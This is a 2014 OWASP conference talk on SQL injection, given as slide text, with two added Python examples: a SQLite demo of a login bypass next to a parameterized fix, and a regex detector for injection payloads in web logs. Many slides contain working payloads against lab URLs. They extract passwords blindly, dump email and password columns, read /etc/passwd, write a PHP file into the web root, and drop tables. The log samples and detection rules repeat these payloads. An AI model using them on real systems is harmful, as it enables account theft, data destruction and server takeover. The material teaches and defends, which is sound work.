SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto

Topic: SQL Injection 101 : It is not just about ' or '1'='1
Speaker: Pichaya Morimoto
Event: OWASP Thailand Meeting 3/2014
Date: August 28, 2014

Published in: Software

  1. SQL Injection 101: It is not just about ' or '1'='1. Pichaya Morimoto (pichaya@ieee.org, fb.com/index.htmli, linkedin.com/in/pich4ya)
  2. Legal Warning. Computer Crime Act B.E. 2550 (2007):
     Section 5: Whoever unlawfully accesses a computer system that has a specific access-control measure not intended for their use: imprisonment of up to 6 months or a fine of up to 10,000 baht.
     Section 7: Whoever unlawfully accesses computer data that has a specific access-control measure not intended for their use: imprisonment of up to 2 years or a fine of up to 40,000 baht.
     Section 9: Whoever unlawfully damages, destroys, corrects, changes or adds to, in whole or in part, another person's computer data: imprisonment of up to 5 years or a fine of up to 100,000 baht.
  3. Overview
     ★ Anatomy of a SQL Injection Attack
     ★ Injection Techniques
       ○ B-E-T-U-S
     ★ Privilege Escalation
       ○ File & RCE
     ★ Advanced Attacks
     ★ Case Studies
  4. What is SQL Injection? "A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application." (https://www.owasp.org/index.php/SQL_Injection)
     Diagram: application users (via client programs) -> input entry points (search box, forms, article ID, session ID, HTTP headers, etc.) -> web application -> database. A user injects specially crafted SQL as input to manipulate the results.
  5. Very Popular among Hackers
  6. Impact of SQL Injection. In general, consider SQL injection a high-impact severity.
     Technical impacts: ★ Data loss ★ Bypass authentication ★ Denial of access ★ Can lead to host takeover
     Business impacts: ★ All data could be stolen, modified, or deleted. ★ Could your reputation be harmed?
     * https://www.owasp.org/index.php/Top_10_2013-A1-Injection
     * https://www.owasp.org/index.php/SQL_Injection
  7. Exploitation Complexity (pie chart with slices of 95%, 4% and 1%):
     Easy: SQL injection with Havij by a 3-year-old.
     Very Hard: requires an expert.
     Lunatic: maze queries, 2nd order, blind, complex app logic, bypassing filters/WAF, etc.
  8. A Ton of Tools
     ★ Automated SQL injection tools: SQLMap, Havij, BBQSQL, SQLNinja, SQLiX, BobCat, bSQLHacker, bSQLbf, Absinthe, SQLBrute, Squeeza, SQL Power Injector, etc.
     ★ Web vulnerability scanners
       ○ Commercial: Acunetix, Netsparker, IBM AppScan, HP Fortify, HP WebInspect, BurpSuite Pro, Qualys WAS, etc.
       ○ Free: W3af, Nikto, SkipFish, Vega, OWASP ZAP, etc.
  9. Tool == Super Easy?
  10. Tool == Super Easy?
  11. Tools are there, so why learn SQLi?
     1. When tools fail to exploit
     2. False positives: ★ Complex database query ★ Complex application logic ★ Encodings & blacklist filters ★ Post-authentication ★ Anti-CSRF token ★ Non-SELECT statements ★ Programmer is so indie
     3. It's just fun, and sometimes it can make good money... in case you are a penetration tester, or just a zero-day hunter ;) Popular websites have already been scanned by those available tools. It is a real challenge to find the flaws that the tools overlooked.
  12. Quote from a Hacker: "A great hacker is not one who can hack 1,000 websites, but one who can hack the same website 1,000 times, even though it has been patched every time." - ตาเล็ก Windows98SE
  13. SQL Injection Techniques: 1. Boolean-based blind 2. Error-based 3. Time-based blind 4. UNION query-based 5. Stacked queries
  14. Boolean-based blind technique
     ★ Inject a SQL string to control whether the result is TRUE or FALSE using boolean algebra
     ★ You determine TRUE/FALSE by analysing the HTTP responses (string/regex/page length/HTTP status)
     ★ Retrieve arbitrary data:
       ○ Sub-queries with "SELECT" + conditions (CASE-WHEN, IF-THEN)
  15. Example of Vulnerable Code. The user input TITLE is inserted into the SQL query. TRUE case: title = naruto. FALSE case: title = abc123.
  16. Boolean-based blind: Probe
     ★ title = naruto   SQL: SELECT * FROM bookshop WHERE title='naruto'   Result: found (TRUE)
     ★ title = abc123   SQL: SELECT * FROM bookshop WHERE title='abc123'   Result: not found (FALSE)
     ★ title = naruto' and '1'='1   SQL: ..WHERE title='naruto' and '1'='1'   Result: found (TRUE)
     ★ title = naruto' and 1=2-- -   SQL: ..WHERE title='naruto' and 1=2-- -'   Result: not found (FALSE)
     Insert another condition joined with the 'AND' operator: T & T = T, T & F = F. MySQL comment styles: -- -, #, /**/
  17. Boolean-based blind: Exploit
     ★ title=naruto' and 'cat'=(if(3>2,'cat','dog'))-- -   Result: found (TRUE)
     ★ title=naruto' and 'cat'=(if(1>5,'cat','dog'))-- -   Result: not found (FALSE)
     ★ title=naruto' and 'cat'=(if(database()='owasp_db','cat','dog'))-- -   Result: found (TRUE)
     ★ title=naruto' and 'cat'=(if(mid(database(),1,1)='a','cat','dog'))-- -   Result: not found (does not start with 'a') ... then try 'b', 'c', ...
     ★ title=naruto' and 'cat'=(if(mid(database(),1,1)='o','cat','dog'))-- -   Result: found (starts with 'o'); then move on to the next character.
     MySQL IF function: IF(<condition>, <return when TRUE>, <return when FALSE>)
     MySQL substring functions: 1. SUBSTRING(str, pos, len) 2. SUBSTR(str, pos, len) 3. MID(str, pos, len)
  18. Example of Vulnerable Code (unvalidated user input)
         $email=$_POST['email'];
         $password=$_POST['password'];
         $sql="SELECT * FROM users WHERE (email='$email')";
         $sql.=" AND (password='$password')";
         $result = mysql_query($sql);
         if(mysql_num_rows($result)){
             die(header('location: member.php'));        // TRUE (login successful): HTTP/1.1 302 Found, location: member.php
         }else{
             die(header('HTTP/1.0 401 Unauthorized'));   // FALSE (login failed): HTTP/1.0 401 Unauthorized
         }
     Exploit: curl -v http://url/login.php -d "email=a&password=')||(2>'1"
     Resulting query: ... WHERE (email='a') AND (password='')||(2>'1')   (always TRUE)
  19. Boolean-based blind: Exploit (char position 1; "select password from users" reads the first record of the password column)
     password=1' or 2>(if(mid((select password from users),1,1)='a',1,3))-- -   -> HTTP/1.0 401 Unauthorized
     password=1' or 2>(if(mid((select password from users),1,1)='b',1,3))-- -   -> HTTP/1.0 401 Unauthorized
     ...
     password=1' or 2>(if(mid((select password from users),1,1)='t',1,3))-- -   -> HTTP/1.1 302 Found, location: member.php
     If char position 1 equals 'a' then return 1, otherwise return 3. When the result is the TRUE case, the 1st char is the current guess ('t').
  20. Boolean-based blind: Exploit
     password=1' or 2>(if(mid((select password from users),2,1)='a',1,3))-- -   -> HTTP/1.0 401 Unauthorized
     Go to the next character and repeat the steps until you get all the text from the results! Tip: find length(<query>) first.
  21. Boolean-based blind: Exploit. Looking for an automated way? If the flaw is not too complicated, we can just switch to SQLMap. But keep in mind there are A LOT of tricky patterns that tools cannot figure out how to evaluate as TRUE or FALSE, so just write your own script! Faster blind test algorithms: ★ Bisection algorithm (binary search) ★ Bit-shift algorithm ★ Regular expression search
  22. Error-based: Concept
     ★ Inject specially crafted invalid SQL syntax
     ★ Ideally, force the web application to expose an error message that contains the injection results
     ★ Methods depend solely on the DBMS
     ★ Rarely found in production web apps
  23. Example of Vulnerable Code
         function search_book($title){
             global $con;
             $sql = "SELECT * FROM bookshop WHERE title='".$title."'";
             // shows the database error message when the query results in an error
             $result = mysql_query($sql) or die(mysql_error($con));
             if(mysql_num_rows($result)){
                 return 'found';
             }else{
                 return 'not found';
             }
         }
         $book_title = $_GET['title'];
         $book_status = search_book($book_title);
         echo '<h1>Result: '.$book_status.'</h1>';
  24. Error-based: Exploit
     http://url/searchbook.php?title=' and extractvalue(rand(), concat(0x3a, (select concat(user(),database())) ))-- -
  25. Error-based: Exploit
     http://url/searchbook.php?title=' and extractvalue(rand(), concat(0x3a, (select concat_ws(0x3a,email,password) from users limit 2,1) ))-- -
     Caution: error messages have a limited allowed length. So what? Use length() + mid() ;)
  26. Time-based blind: Concept
     ★ Inject a valid SQL string that
       ○ waits a few seconds in the TRUE condition and ...
       ○ delays longer/shorter for FALSE
     ★ Analyse the response time to determine the result of the queries
     ★ Takes a long time to get results, but very useful for hacking completely blind flaws
  27. Example of Vulnerable Code
  28. Time-based blind: Exploit
     newbook.php?title=aaa&author=bbb'+if(ord(mid((select version()),12,1))>108,sleep(5),sleep(10)))--+-
     SQL: INSERT INTO bookshop(title,author) values ('aaa','bbb'+if(ord(mid((select version()),12,1))>108,sleep(5),sleep(10)))-- -')
     TRUE case: sleep(5), delay 5 seconds. FALSE case: sleep(10), delay 10 seconds. Observed: delay of 5 seconds.
  29. Time-based blind: Exploit. Write a script to automate the attack! For example, http://www.blackhatlibrary.net/SQL_injection/mysqli-blindutils/sqli-slee.py
  30. Time-based blind: Exploit. sleep() executed!
  31. UNION query-based: Concept
     ★ The most popular method found in SQL injection tutorials on Google/YouTube
     ★ Inject a valid SQL string by making the left-side SELECT false and then appending "UNION" with another right-side SELECT query that has the same number of columns and contains what you want to fetch.
  32. Example of Vulnerable Code. The unvalidated parameter 'author' is passed into the SQL query.
  33. UNION query-based: Exploit
     Step 1: Find the number of columns of the left SELECT statement using 'ORDER BY'
     http://owasp-sqli.local/showbook.php?author=longcat' order by 1-- -
     There are columns no. 1-4 in the underlying SELECT query. There is no 5th column; if DB error messages are on, you will see: Unknown column '5' in 'order clause'
  34. UNION query-based: Exploit
     Step 2.1: We do not need the result of the 1st SELECT query, so discard it with an 'always FALSE' condition.
     http://owasp-sqli.local/showbook.php?author=longcat' and 1>2-- -
     Step 2.2: Insert a 2nd SELECT query separated by UNION
     http://owasp-sqli.local/showbook.php?author=longcat' and 1>2 UNION select 1,2,3,4-- -
     The result of "SELECT 1,2,3,4" replaces where the result of the 1st SELECT was.
  35. UNION query-based: Exploit
     Exploit: http://owasp-sqli.local/showbook.php?author=longcat' and 1>2 union select user(),database(),version(),(select group_concat(email, password) from users)--+-
     Tips, database metadata: select database(); select table_name from information_schema.tables; select column_name from information_schema.columns
  36. Stacked Queries: Concept
     ★ Append another query to the injection
     ★ Not all DBMS drivers/APIs support stacked queries
     ★ Very effective for MS-SQL, SQLite
     Attack scenario: User input = 123   SQL: SELECT email FROM users where id=123
     User input = 456; DROP table users   SQL: ... users where id=456; DROP table users
  37. Example of Vulnerable Code
  38. Stacked queries: Exploit
  39. Privilege Escalation
     ★ Read credentials from configuration files
     ★ Create an accessible web backdoor
     ★ Arbitrary OS command execution
  40. SQL Injection: Read File
     Exploit: http://owasp-sqli.local/showbook.php?author=longcat' and 1>2 union select 1,load_file('/etc/passwd'),3,4--+-
  41. SQL Injection: Write File
     Exploit: http://owasp-sqli.local/showbook.php?author=longcat' and 1>2 union select 0x3c3f70687020706870696e666f28293b203f3e,null,null,null into outfile '/var/www/owasp-sqli.local/public_html/upload/info.php'--+-
  42. SQL Injection: OS Command Shell
     1. Write file > web backdoor (e.g. http://youtube.com/watch?v=QIXTPPBfLyI)
     2. Built-in OS command functions / UDF; MS-SQL xp_cmdshell
  43. Advanced Attacks
     ★ MySQL second-order SQL injection
     ★ Abusing PHP PDO prepared statements
     ★ Making a backdoor with SQLite
     ★ How a hashed string causes a SQL injection flaw
     ★ Account takeover with the SQL truncation attack
     ★ CodeIgniter Active Record bypass
  44. Next Time :s
  45. Thanks! Need more? Good resources:
     https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)
     https://www.owasp.org/index.php/Blind_SQL_Injection
     http://websec.ca/kb/sql_injection
     https://github.com/sqlmapproject/sqlmap
     http://www.amazon.com/Injection-Attacks-Defense-Second-Edition/dp/1597499633
     Build your own SQL injection playground:
     https://github.com/SpiderLabs/MCIR/tree/master/sqlol
     https://github.com/Audi-1/sqli-labs
     https://github.com/sqlmapproject/testenv
     https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project
     https://pentesterlab.com/exercises/web_for_pentester/
     https://pentesterlab.com/exercises/from_sqli_to_shell_II/
     https://pentesterlab.com/exercises/from_sqli_to_shell_pg_edition/
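The login check from slide 18 rebuilt on SQLite in Python, with a parameterized counterpart beside it and the error leak of slide 23, as an added example that is not the talk's PHP code; the users table, the bypass payload (the title's ' or '1'='1 shape adapted to the slide's parenthesised WHERE clause) and the error_leak helper are constructed here.

```python
"""Slide 18's string-built login check on SQLite, next to the parameterized version.
Added example; the talk's own code is PHP/MySQL. Table contents and payload are constructed."""
import sqlite3


def make_db():
    """Constructed sample data: one registered user (plain-text password, as on the slide)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, password TEXT)")
    con.execute("INSERT INTO users (email, password) VALUES ('alice@example.com', 'topsecret')")
    return con


def login_vulnerable(con, email, password):
    """Mirrors the slide: input is pasted into the SQL text, so it can change the syntax."""
    sql = f"SELECT * FROM users WHERE (email='{email}') AND (password='{password}')"
    return con.execute(sql).fetchone() is not None


def login_parameterized(con, email, password):
    """Same query with bound parameters: the driver keeps input as data, never as SQL."""
    sql = "SELECT * FROM users WHERE (email=?) AND (password=?)"
    return con.execute(sql, (email, password)).fetchone() is not None


# Constructed payload: closes the password literal and its parenthesis, then ORs a true clause:
#   WHERE (email='a') AND (password='') OR ('1'='1')   -> every row matches
BYPASS = "') OR ('1'='1"


def error_leak(con, email):
    """What slide 23's die(mysql_error()) hands out: the raw DB error for a broken query.
    Returns the error text, or None when the query parsed. The error-based technique of
    slides 22-25 relies on this leak; a hardened app logs the error server-side and
    answers with a generic message instead."""
    try:
        login_vulnerable(con, email, "x")
        return None
    except sqlite3.Error as exc:
        return str(exc)


def demo():
    """Run both login variants against valid, wrong and bypass credentials."""
    con = make_db()
    return {
        "vuln_valid": login_vulnerable(con, "alice@example.com", "topsecret"),
        "vuln_wrong": login_vulnerable(con, "alice@example.com", "wrong"),
        "vuln_bypass": login_vulnerable(con, "a", BYPASS),        # True: authentication bypassed
        "safe_valid": login_parameterized(con, "alice@example.com", "topsecret"),
        "safe_bypass": login_parameterized(con, "a", BYPASS),     # False: payload is only a string
        "error_text": error_leak(con, "'"),                       # a lone quote breaks the syntax
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```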

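Detection logic for the payload shapes shown on the B-E-T-U-S and file-access slides (16 to 42), run over constructed web-server access log lines, as an added example that is not part of the talk; the log lines, rule names and regular expressions are this example's own assumptions.

```python
"""Flag the B-E-T-U-S payload shapes from the talk in access logs (added example, not from
the talk). Log lines, rule names and patterns are constructed here."""
import re
from urllib.parse import unquote_plus

# One rule per technique from the slides, keyed on the functions/keywords their payloads use.
RULES = [
    ("union-query",   re.compile(r"\bunion\b\s+(all\s+)?select\b", re.I)),
    ("error-based",   re.compile(r"\b(extractvalue|updatexml)\s*\(", re.I)),
    ("time-based",    re.compile(r"\b(sleep|benchmark)\s*\(", re.I)),
    ("boolean-blind", re.compile(r"\b(if|case)\s*\(.*\b(mid|substr|substring)\s*\(", re.I)),
    ("file-access",   re.compile(r"\bload_file\s*\(|\binto\s+(out|dump)file\b", re.I)),
    ("stacked-query", re.compile(r";\s*(drop|insert|update|delete|exec)\b", re.I)),
    # Supporting signal only: the comment tails from slide 16 (-- -, #, /**/) end most payloads.
    ("comment-tail",  re.compile(r"--\s|#|/\*")),
]

# Combined-log request field: method, path and optional query string.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>[^\s?]+)(?:\?(?P<query>\S*))? HTTP/')


def classify_request(line):
    """Return the technique names whose pattern matches the URL-decoded query string."""
    m = REQUEST_RE.search(line)
    if not m or not m.group("query"):
        return []
    decoded = unquote_plus(m.group("query"))   # '+' and %xx become the SQL the server saw
    return [name for name, rx in RULES if rx.search(decoded)]


def scan(lines):
    """Classify every line; returns one technique list per input line, in order."""
    return [classify_request(line) for line in lines]


# Constructed log lines modelled on the talk's URLs (the POST body of slide 19 is shown as a
# GET query here, since access logs do not record request bodies).
PREFIX = '127.0.0.1 - - [28/Aug/2014:19:00:00 +0700] '
SAMPLE_LOG = [
    PREFIX + '"GET /showbook.php?author=longcat HTTP/1.1" 200 512',
    PREFIX + '"GET /showbook.php?author=longcat%27+and+1%3E2+union+select+1,2,3,4--+- HTTP/1.1" 200 611',
    PREFIX + '"GET /searchbook.php?title=%27+and+extractvalue(rand(),concat(0x3a,(select+user())))--+- HTTP/1.1" 200 402',
    PREFIX + '"GET /newbook.php?title=aaa&author=bbb%27%2Bif(ord(mid((select+version()),12,1))%3E108,sleep(5),sleep(10)))--+- HTTP/1.1" 200 88',
    PREFIX + '"GET /login.php?email=a&password=1%27+or+2%3E(if(mid((select+password+from+users),1,1)%3D%27t%27,1,3))--+- HTTP/1.1" 302 0',
    PREFIX + '"GET /showbook.php?author=longcat%27+and+1%3E2+union+select+1,load_file(%27/etc/passwd%27),3,4--+- HTTP/1.1" 200 1420',
    PREFIX + '"GET /profile.php?id=456%3B+DROP+table+users HTTP/1.1" 500 0',
]


if __name__ == "__main__":
    for line, hits in zip(SAMPLE_LOG, scan(SAMPLE_LOG)):
        print(hits or ["clean"], line.split('"')[1])
```

The time-based line also trips the boolean-blind rule because the slide 28 payload nests mid() inside if(); treat the rule names as overlapping signals, not exclusive classes.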